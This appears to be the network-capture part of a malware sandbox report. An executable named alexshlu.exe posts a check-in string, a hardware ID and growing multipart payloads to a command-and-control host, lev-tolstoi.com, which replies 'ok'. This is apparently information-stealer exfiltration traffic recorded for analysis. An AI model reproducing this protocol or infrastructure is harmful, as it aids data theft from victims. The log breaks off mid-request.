                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.849708172.67.157.2544437720C:\Users\user\Desktop\alexshlu.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 11:08:12 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 50
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 11:08:12 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72 26 6a 3d
                                                                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=FATE99--november&j=
                                                                                                                                                                                                                                      2024-12-18 11:08:16 UTC1029INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 11:08:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=k80u0a1vofcsbef2j4vh3khctg; expires=Sun, 13-Apr-2025 04:54:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vie4uMlTwmzetcHhjN2pJBa4H4lNMWMs8N339dyVnitLLeAQgNJBozKKobwB8u7GLMCR1JJyktA8wbV4ygb8Ddp3o7dEBC9Fbru1eWNC39e5y1OKw5AdkYLEvNgjPoqmSSI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3eb196894f8c87-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2078&min_rtt=2018&rtt_var=800&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=949&delivery_rate=1446977&cwnd=214&unsent_bytes=0&cid=3e04554df55ffac2&ts=3700&x=0"
                                                                                                                                                                                                                                      2024-12-18 11:08:16 UTC340INData Raw: 32 64 63 61 0d 0a 6f 4a 57 67 76 48 6a 55 4f 49 6c 6d 76 71 75 36 4c 36 50 4f 71 66 7a 4f 58 6f 53 6b 48 4a 4c 69 37 48 6a 54 73 74 76 70 72 6d 33 62 74 39 61 65 51 75 41 55 71 78 58 62 69 59 42 62 30 62 76 4d 30 4f 77 2f 34 49 59 6d 39 49 4f 41 43 37 61 65 2b 5a 2f 44 54 35 72 7a 77 64 41 4c 73 52 53 72 41 38 61 4a 67 48 54 59 37 4d 79 53 37 47 53 6d 77 58 62 77 67 34 41 61 73 74 6d 30 6d 63 49 4f 79 50 6e 48 31 42 32 33 58 4f 67 4b 30 38 37 66 53 73 4b 6b 78 35 57 6a 4e 75 6d 47 4d 4c 43 48 6c 6c 72 70 6b 4a 61 4d 32 67 7a 74 39 4e 50 58 57 71 6b 55 38 6b 54 62 78 5a 67 56 67 61 2f 4d 6e 71 49 34 34 4d 39 30 2b 6f 71 49 47 37 66 59 71 34 44 49 42 63 6a 33 78 4e 55 58 76 6b 6a 6c 41 4e 54 46 32 55 44 43 37 49 58 65 71 79 53 6d 6e 6a 36 6a 73 6f 30 4c 6f
                                                                                                                                                                                                                                      Data Ascii: 2dcaoJWgvHjUOIlmvqu6L6POqfzOXoSkHJLi7HjTstvprm3bt9aeQuAUqxXbiYBb0bvM0Ow/4IYm9IOAC7ae+Z/DT5rzwdALsRSrA8aJgHTY7MyS7GSmwXbwg4Aastm0mcIOyPnH1B23XOgK087fSsKkx5WjNumGMLCHllrpkJaM2gzt9NPXWqkU8kTbxZgVga/MnqI44M90+oqIG7fYq4DIBcj3xNUXvkjlANTF2UDC7IXeqySmnj6jso0Lo
                                                                                                                                                                                                                                      2024-12-18 11:08:16 UTC1369INData Raw: 2f 4a 2b 59 7a 41 54 35 71 33 78 4e 41 62 75 31 72 35 44 4e 66 43 33 56 2f 4b 70 63 61 54 72 44 48 73 79 58 33 77 68 34 51 51 76 74 71 39 68 73 45 4a 77 76 65 43 6b 46 71 78 51 71 74 63 6e 4f 72 64 58 63 61 67 33 64 79 57 66 50 6d 49 5a 37 43 48 67 6c 72 70 6b 4c 47 4f 7a 77 7a 4a 2b 4d 48 57 45 61 52 61 2b 51 4c 52 7a 4d 70 4c 78 4b 4c 42 6e 62 34 32 36 4d 42 39 2b 59 75 48 48 37 62 55 2b 63 57 4d 43 4e 71 33 6d 70 34 37 75 31 48 6e 44 73 76 4a 6d 46 4b 50 74 59 75 5a 6f 48 79 2b 68 6e 72 78 68 49 38 65 76 39 36 39 68 38 6f 42 7a 2f 6a 45 31 42 71 78 55 4f 4d 4d 33 63 54 54 51 73 47 70 78 70 71 71 4d 4f 66 44 50 72 37 41 69 51 4c 78 69 50 6d 6c 79 77 7a 51 74 66 66 64 46 4c 68 64 2f 55 54 44 68 38 45 4e 78 71 43 4c 78 75 77 79 34 38 6c 73 38 5a 4b 4c 46
                                                                                                                                                                                                                                      Data Ascii: /J+YzAT5q3xNAbu1r5DNfC3V/KpcaTrDHsyX3wh4QQvtq9hsEJwveCkFqxQqtcnOrdXcag3dyWfPmIZ7CHglrpkLGOzwzJ+MHWEaRa+QLRzMpLxKLBnb426MB9+YuHH7bU+cWMCNq3mp47u1HnDsvJmFKPtYuZoHy+hnrxhI8ev969h8oBz/jE1BqxUOMM3cTTQsGpxpqqMOfDPr7AiQLxiPmlywzQtffdFLhd/UTDh8ENxqCLxuwy48ls8ZKLF
                                                                                                                                                                                                                                      2024-12-18 11:08:16 UTC1369INData Raw: 4c 2f 52 6a 4a 74 66 66 64 46 4c 68 64 2f 55 54 44 68 38 45 4e 78 71 43 4c 78 75 77 78 37 73 4e 37 2f 34 47 45 46 4c 54 61 74 59 50 43 44 4e 44 34 78 74 34 57 76 6c 44 6d 43 74 6a 42 30 55 62 4b 71 73 75 66 70 6e 79 6f 68 6e 6e 6f 77 4e 5a 61 68 64 65 31 68 73 4e 4e 39 2f 54 4d 30 42 32 67 47 76 52 4b 78 59 6e 66 51 59 48 30 69 35 4b 6c 50 4f 33 4d 65 76 43 48 67 78 2b 79 31 37 71 47 79 77 58 4d 38 4d 62 53 45 37 74 63 36 77 50 59 7a 4d 70 49 79 4b 44 48 33 75 4a 38 34 64 34 2b 71 4d 43 68 48 61 66 54 6c 6f 6a 64 42 6f 4c 6f 6a 4d 64 61 73 56 61 72 58 4a 7a 4f 33 55 58 4b 71 73 4f 65 76 6a 6e 6f 7a 58 2f 36 68 6f 38 58 76 64 61 35 69 73 77 4a 7a 76 66 46 32 51 69 6b 58 2b 30 57 31 6f 6d 57 44 63 61 30 69 38 62 73 43 76 62 52 62 2b 62 43 75 78 6d 2f 33 72
                                                                                                                                                                                                                                      Data Ascii: L/RjJtffdFLhd/UTDh8ENxqCLxuwx7sN7/4GEFLTatYPCDND4xt4WvlDmCtjB0UbKqsufpnyohnnowNZahde1hsNN9/TM0B2gGvRKxYnfQYH0i5KlPO3MevCHgx+y17qGywXM8MbSE7tc6wPYzMpIyKDH3uJ84d4+qMChHafTlojdBoLojMdasVarXJzO3UXKqsOevjnozX/6ho8Xvda5iswJzvfF2QikX+0W1omWDca0i8bsCvbRb+bCuxm/3r
                                                                                                                                                                                                                                      2024-12-18 11:08:16 UTC1369INData Raw: 7a 50 48 45 30 78 2b 35 55 50 6b 4d 30 73 54 54 51 73 71 2b 79 35 4f 6f 4d 4f 4c 4f 64 66 72 41 77 46 71 32 79 50 6e 54 6a 44 72 50 2b 4d 4c 64 44 50 5a 46 70 52 32 63 7a 74 51 4e 6d 65 7a 48 6b 4b 77 7a 36 73 70 31 2b 49 47 43 46 4c 62 56 73 49 50 45 48 63 50 7a 79 74 38 55 75 56 76 76 41 64 6e 4e 33 30 6e 48 6f 34 76 51 37 44 76 2b 68 69 61 77 72 36 6b 76 38 2f 47 44 79 39 4e 42 32 37 66 46 30 6c 72 75 47 75 63 48 30 4d 48 58 53 38 69 67 77 5a 65 6e 4d 4f 33 43 63 76 6d 46 69 42 75 30 31 62 69 50 77 41 58 45 39 4d 48 52 46 62 6c 53 71 30 71 63 7a 73 41 4e 6d 65 7a 75 69 61 63 79 34 49 5a 68 76 70 6e 4f 48 62 32 51 34 63 76 41 42 73 54 78 78 39 49 62 73 46 4c 75 44 4e 6a 49 33 6b 76 43 6f 38 2b 62 72 54 50 69 79 6e 44 36 67 59 38 57 75 74 2b 79 6a 6f 78
                                                                                                                                                                                                                                      Data Ascii: zPHE0x+5UPkM0sTTQsq+y5OoMOLOdfrAwFq2yPnTjDrP+MLdDPZFpR2cztQNmezHkKwz6sp1+IGCFLbVsIPEHcPzyt8UuVvvAdnN30nHo4vQ7Dv+hiawr6kv8/GDy9NB27fF0lruGucH0MHXS8igwZenMO3CcvmFiBu01biPwAXE9MHRFblSq0qczsANmezuiacy4IZhvpnOHb2Q4cvABsTxx9IbsFLuDNjI3kvCo8+brTPiynD6gY8Wut+yjox
                                                                                                                                                                                                                                      2024-12-18 11:08:16 UTC1369INData Raw: 4e 45 63 74 31 2f 68 43 4e 76 4d 30 30 4c 4e 37 49 58 65 71 79 53 6d 6e 6a 37 65 69 35 30 4e 73 74 36 79 6e 64 64 50 33 62 6e 62 6e 68 32 36 47 72 4e 45 33 38 4c 54 53 63 47 67 79 35 71 68 50 50 54 4a 65 66 65 4a 68 51 69 37 31 37 36 41 78 41 54 4e 38 64 44 53 46 4b 52 66 2b 52 61 63 68 35 68 4b 32 65 79 54 33 70 6f 37 39 74 5a 39 73 72 47 59 47 61 66 62 74 49 65 4d 45 49 7a 75 67 74 6b 57 39 67 4b 72 41 74 50 41 32 30 4c 41 70 63 65 54 71 54 58 6a 78 33 6a 30 69 6f 51 61 74 39 61 34 6a 73 59 4d 77 2f 33 4c 32 52 4b 78 57 66 6c 45 6b 6f 6e 66 56 59 48 30 69 37 65 72 4c 75 6a 57 50 75 2f 4f 6c 31 71 32 33 50 6e 54 6a 41 76 49 2b 4d 62 5a 46 72 42 66 37 51 6e 64 78 74 6c 4e 7a 71 6a 41 6c 36 6f 39 36 38 4e 7a 39 4a 4b 45 45 62 37 63 73 49 66 42 54 34 79 33
                                                                                                                                                                                                                                      Data Ascii: NEct1/hCNvM00LN7IXeqySmnj7ei50Nst6ynddP3bnbnh26GrNE38LTScGgy5qhPPTJefeJhQi7176AxATN8dDSFKRf+Rach5hK2eyT3po79tZ9srGYGafbtIeMEIzugtkW9gKrAtPA20LApceTqTXjx3j0ioQat9a4jsYMw/3L2RKxWflEkonfVYH0i7erLujWPu/Ol1q23PnTjAvI+MbZFrBf7QndxtlNzqjAl6o968Nz9JKEEb7csIfBT4y3
                                                                                                                                                                                                                                      2024-12-18 11:08:16 UTC1369INData Raw: 56 49 36 67 4c 4f 79 64 56 48 30 36 62 41 6d 36 45 78 36 38 56 34 39 6f 75 43 43 4c 6a 51 75 6f 43 4d 51 59 4c 77 32 70 35 43 39 6e 6e 38 45 74 62 4f 31 46 76 4b 72 63 69 49 6f 53 79 6d 69 44 37 68 68 35 39 61 36 63 61 70 6e 4d 73 51 6a 4f 36 43 32 52 62 32 41 71 73 43 31 63 2f 66 53 38 2b 2b 7a 70 69 6a 4d 2b 2f 50 65 76 69 44 6a 68 36 31 31 37 79 49 77 41 54 46 39 4d 33 61 45 37 68 54 35 45 53 53 69 64 39 56 67 66 53 4c 76 37 63 2f 36 73 73 2b 37 38 36 58 57 72 62 63 2b 64 4f 4d 41 38 7a 79 77 74 51 63 73 6c 2f 74 44 74 6e 4a 30 30 37 4f 71 4d 32 61 6f 7a 7a 74 7a 33 2f 32 68 59 51 52 74 39 32 36 6a 63 70 50 6a 4c 66 46 78 6c 72 75 47 73 73 66 30 63 58 66 44 64 37 69 30 74 36 72 4d 4b 61 65 50 76 75 4d 69 68 32 78 33 62 71 44 79 51 76 49 38 73 4c 57 43
                                                                                                                                                                                                                                      Data Ascii: VI6gLOydVH06bAm6Ex68V49ouCCLjQuoCMQYLw2p5C9nn8EtbO1FvKrciIoSymiD7hh59a6capnMsQjO6C2Rb2AqsC1c/fS8++zpijM+/PeviDjh6117yIwATF9M3aE7hT5ESSid9VgfSLv7c/6ss+786XWrbc+dOMA8zywtQcsl/tDtnJ007OqM2aozztz3/2hYQRt926jcpPjLfFxlruGssf0cXfDd7i0t6rMKaePvuMih2x3bqDyQvI8sLWC
                                                                                                                                                                                                                                      2024-12-18 11:08:16 UTC1369INData Raw: 45 6b 6f 6e 66 57 34 48 30 69 36 44 73 4c 75 58 57 66 66 2b 52 73 46 72 70 79 59 66 4c 78 78 6e 46 35 38 48 49 45 62 74 57 2b 6a 71 63 6b 59 77 66 6b 2f 36 5a 7a 4c 4e 38 2b 66 6b 77 73 49 48 4f 51 6f 6a 4a 2b 5a 32 4d 56 35 43 35 67 73 78 61 37 68 71 73 42 38 37 62 33 6b 37 58 72 34 79 67 6b 68 76 77 7a 48 6e 67 68 35 6b 56 38 5a 37 35 68 49 78 58 2b 37 66 4c 32 51 47 6e 54 4f 59 55 32 34 6e 6e 41 34 47 30 69 38 62 73 43 65 58 49 63 50 65 57 6e 31 65 57 78 72 4f 4d 33 41 6a 56 2b 49 4b 51 57 72 41 61 73 31 65 53 69 64 78 63 67 66 53 62 7a 50 64 70 74 5a 45 75 6f 70 2f 41 41 2f 48 47 2b 64 4f 65 51 59 4c 6c 67 6f 5a 61 38 56 6e 35 46 74 72 4b 7a 6b 36 47 6b 76 57 35 74 6a 48 67 30 57 2f 4f 76 6f 6b 41 76 4e 61 75 6d 6f 41 61 77 66 6e 4d 32 51 7a 32 46 4b
                                                                                                                                                                                                                                      Data Ascii: EkonfW4H0i6DsLuXWff+RsFrpyYfLxxnF58HIEbtW+jqckYwfk/6ZzLN8+fkwsIHOQojJ+Z2MV5C5gsxa7hqsB87b3k7Xr4ygkhvwzHngh5kV8Z75hIxX+7fL2QGnTOYU24nnA4G0i8bsCeXIcPeWn1eWxrOM3AjV+IKQWrAas1eSidxcgfSbzPdptZEuop/AA/HG+dOeQYLlgoZa8Vn5FtrKzk6GkvW5tjHg0W/OvokAvNaumoAawfnM2Qz2FK
                                                                                                                                                                                                                                      2024-12-18 11:08:16 UTC1369INData Raw: 69 41 4f 42 71 4e 72 65 39 47 79 30 6e 53 75 6a 31 39 35 49 72 70 36 67 79 39 70 50 6d 71 57 4d 6e 67 6a 32 41 71 74 44 33 39 76 4b 53 38 4b 36 79 4e 6d 53 41 73 48 49 65 66 47 57 6e 67 32 2b 37 6f 65 65 7a 77 48 4d 38 4e 54 50 57 76 67 61 35 45 53 45 38 4a 67 46 67 5a 4f 46 33 72 52 38 76 6f 5a 4c 38 34 36 41 48 61 66 42 39 4b 7a 43 43 4d 50 68 30 73 6b 56 39 68 53 72 41 70 79 52 69 67 4f 42 71 4e 72 65 39 47 79 30 6e 53 75 6a 31 39 35 49 72 70 36 67 79 39 70 50 6d 71 57 4d 6e 67 6a 32 41 71 74 44 33 39 76 4b 53 38 4b 36 79 4e 6d 53 41 73 48 49 65 66 47 57 6e 67 32 2b 6e 35 65 39 37 54 48 38 34 73 48 51 46 4c 46 4d 2b 6b 53 53 69 64 63 4e 6d 5a 57 4c 31 75 77 44 71 49 5a 6d 73 4e 6a 4f 4c 37 4c 65 74 34 7a 61 48 6f 2f 51 7a 4e 6b 62 6f 45 72 38 43 35 50
                                                                                                                                                                                                                                      Data Ascii: iAOBqNre9Gy0nSuj195Irp6gy9pPmqWMngj2AqtD39vKS8K6yNmSAsHIefGWng2+7oeezwHM8NTPWvga5ESE8JgFgZOF3rR8voZL846AHafB9KzCCMPh0skV9hSrApyRigOBqNre9Gy0nSuj195Irp6gy9pPmqWMngj2AqtD39vKS8K6yNmSAsHIefGWng2+n5e97TH84sHQFLFM+kSSidcNmZWL1uwDqIZmsNjOL7Let4zaHo/QzNkboEr8C5P
                                                                                                                                                                                                                                      2024-12-18 11:08:16 UTC1369INData Raw: 4b 48 50 69 4c 6b 2f 39 73 46 41 7a 71 32 63 48 61 48 54 2b 37 72 61 44 4d 4c 35 78 5a 35 55 39 6b 4b 72 58 4a 7a 6b 79 6b 72 52 72 34 76 51 37 44 43 6d 6e 6a 37 39 6b 6f 6b 4b 73 70 79 2b 6b 63 74 50 33 62 6e 62 6e 67 7a 32 41 72 68 4b 6e 4e 75 59 46 59 48 72 78 5a 4f 74 50 2b 6a 46 62 4f 4b 47 6a 51 79 79 6c 34 65 31 34 52 33 46 35 38 47 63 4b 37 74 65 2f 52 48 66 32 64 39 7a 2f 34 48 5a 6d 62 77 2f 70 4f 70 35 2f 59 79 77 4a 49 62 42 76 70 75 4f 4b 63 48 68 77 5a 35 55 39 6b 4b 72 58 4a 7a 6b 79 6b 72 52 72 34 6d 79 71 7a 48 71 68 6d 47 2b 6d 63 34 4d 38 59 6a 71 78 59 77 64 67 71 2b 43 6d 52 6d 6b 53 4f 30 48 79 73 71 66 63 2f 2b 42 32 5a 6d 38 50 36 54 33 63 2f 53 57 6d 78 6d 68 31 34 65 31 34 52 33 46 35 38 47 63 50 34 77 59 32 68 4c 66 79 64 5a 4b
                                                                                                                                                                                                                                      Data Ascii: KHPiLk/9sFAzq2cHaHT+7raDML5xZ5U9kKrXJzkykrRr4vQ7DCmnj79kokKspy+kctP3bnbngz2ArhKnNuYFYHrxZOtP+jFbOKGjQyyl4e14R3F58GcK7te/RHf2d9z/4HZmbw/pOp5/YywJIbBvpuOKcHhwZ5U9kKrXJzkykrRr4myqzHqhmG+mc4M8YjqxYwdgq+CmRmkSO0Hysqfc/+B2Zm8P6T3c/SWmxmh14e14R3F58GcP4wY2hLfydZK


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.849709172.67.157.2544437720C:\Users\user\Desktop\alexshlu.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 11:08:18 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=N08MCDNNF0PK0HU2Z
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 12843
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 11:08:18 UTC12843OUTData Raw: 2d 2d 4e 30 38 4d 43 44 4e 4e 46 30 50 4b 30 48 55 32 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 45 46 32 37 43 41 33 45 41 42 44 36 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4e 30 38 4d 43 44 4e 4e 46 30 50 4b 30 48 55 32 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 30 38 4d 43 44 4e 4e 46 30 50 4b 30 48 55 32 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72
                                                                                                                                                                                                                                      Data Ascii: --N08MCDNNF0PK0HU2ZContent-Disposition: form-data; name="hwid"3DEF27CA3EABD68D23D904AF30EFEBBC--N08MCDNNF0PK0HU2ZContent-Disposition: form-data; name="pid"2--N08MCDNNF0PK0HU2ZContent-Disposition: form-data; name="lid"FATE99--november
                                                                                                                                                                                                                                      2024-12-18 11:08:20 UTC1041INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 11:08:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=7bbvmtdpgulbfo081ca53llor9; expires=Sun, 13-Apr-2025 04:54:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6TJgThN1lgtV8rzYsbOJ3GCSyQ4pubNTZ8flsSoY%2FvPenMG%2BcTJ%2BqBvUMch8Ng3%2F79OIXIAwPcE5boOz3pmlmv5DYZbCccgFKJ5x80hw5UZOQWOhQJrQfZ4H9KWZCneyXrU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3eb1b72b434357-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1893&min_rtt=1886&rtt_var=712&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13781&delivery_rate=1548250&cwnd=175&unsent_bytes=0&cid=c3cf68e63e88850a&ts=2220&x=0"
                                                                                                                                                                                                                                      2024-12-18 11:08:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2024-12-18 11:08:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.849712172.67.157.2544437720C:\Users\user\Desktop\alexshlu.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 11:08:21 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=UZISBZQ0QWSQV5
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 15054
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 11:08:21 UTC15054OUTData Raw: 2d 2d 55 5a 49 53 42 5a 51 30 51 57 53 51 56 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 45 46 32 37 43 41 33 45 41 42 44 36 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 55 5a 49 53 42 5a 51 30 51 57 53 51 56 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 5a 49 53 42 5a 51 30 51 57 53 51 56 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72 0d 0a 2d 2d 55 5a 49 53 42
                                                                                                                                                                                                                                      Data Ascii: --UZISBZQ0QWSQV5Content-Disposition: form-data; name="hwid"3DEF27CA3EABD68D23D904AF30EFEBBC--UZISBZQ0QWSQV5Content-Disposition: form-data; name="pid"2--UZISBZQ0QWSQV5Content-Disposition: form-data; name="lid"FATE99--november--UZISB
                                                                                                                                                                                                                                      2024-12-18 11:08:24 UTC1039INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 11:08:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=4ii1o324dhdn1t530ksftg29na; expires=Sun, 13-Apr-2025 04:55:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ky6ggzs82g7SnlGmYKBkwqCkqf4wiEUCZi14wpCJf7Ut5RZnT4dyN%2FQdXOJpMJyC7wkQUiuewPICEL%2BDJjudnN7lWdN%2FVy3z8y0uJT8PrGEYGwsIe6TNVQztX26WQLQaVjk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3eb1cd9ca07cb1-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1947&min_rtt=1941&rtt_var=740&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2834&recv_bytes=15989&delivery_rate=1466599&cwnd=235&unsent_bytes=0&cid=c5ddf0580831ae79&ts=2765&x=0"
                                                                                                                                                                                                                                      2024-12-18 11:08:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2024-12-18 11:08:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      5192.168.2.849713172.67.157.2544437720C:\Users\user\Desktop\alexshlu.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 11:08:26 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=DBZLQE7OO4ZHJHDX
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 20233
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
